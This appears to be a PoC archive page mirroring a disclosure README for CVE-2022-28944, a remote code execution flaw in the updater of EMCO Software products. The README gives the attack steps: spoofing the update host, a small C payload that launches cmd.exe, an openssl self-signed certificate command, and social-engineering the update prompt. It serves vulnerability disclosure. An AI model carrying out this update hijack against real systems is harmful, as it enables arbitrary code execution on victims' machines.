Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2022-28944 PoC — 多款EMCO Software产品安全漏洞

Source
https://github.com/gerr-re/cve-2022-28944
Associated Vulnerability
Title:多款EMCO Software产品安全漏洞 (CVE-2022-28944)
Description:Certain EMCO Software products are affected by: CWE-494: Download of Code Without Integrity Check. This affects MSI Package Builder for Windows 9.1.4 and Remote Installer for Windows 6.0.13 and Ping Monitor for Windows 8.0.18 and Remote Shutdown for Windows 7.2.2 and WakeOnLan 2.0.8 and Network Inventory for Windows 5.8.22 and Network Software Scanner for Windows 2.0.8 and UnLock IT for Windows 6.1.1. The impact is: execute arbitrary code (remote). The component is: Updater. The attack vector is: To exploit this vulnerability, a user must trigger an update of an affected installation of EMCO Software. ¶¶ Multiple products from EMCO Software are affected by a remote code execution vulnerability during the update process.
Readme
# CVE-2022-28944
> EMCO Software Multiple Products Unauthenticated Update Remote Code Execution Vulnerability.

Usage: `python3 cve-2022-28944_poc.py`

Details in the report at [gerr.re](https://gerr.re/posts/cve-2022-28944/).

## Steps to reproduce
1. Install an affected product of EMCO Software;
2. Set spoof `storage.emcosoftware.com` to our attacker ip;
    * For a proof-of-concept edit `c:\windows\system32\drivers\etc\hosts` on target.
        - Note: attackers may e.g. use:
            + poorly configured routers/switches/DNS,
            + DNS spoof / cache poisoning,
            + ARP spoof / cache poisoning.
3. Compile `proof.c` on the attacker, e.g. using `i686-w64-mingw32-gcc proof.c -o proof.exe`;
```c
#include <windows.h>
int main(int argc, char const *argv[]){	
	WinExec("cmd.exe",1);
	return TRUE;
}
```
4. Generate self-signed certificates;
   * e.g. using `openssl req -new -x509 -keyout storage.emcosoftware.com.pem -out storage.emcosoftware.com.pem -days 365 -nodes -subj "/CN=storage.emcosoftware.com"`
5. Run the proof-of-concept script;
6. Start the affected product of EMCO Software and either
    * wait a day to trigger update automatically, or
    * trigger the update manually through the application menu;
7. Accept the update in the Update Wizard.
    * Attackers will use a persuasive update description to convince a target to accept the update.
File Snapshot

 [4.0K]  /data/pocs/cdf5ed477b1ac184da505157a7b30010e90b6d4c
├── [2.0K]  cve-2022-28944_poc.py
├── [1.4M]  cve-2022-28944_public-advisory.pdf
├── [ 100]  proof.c
└── [1.4K]  README.md

0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →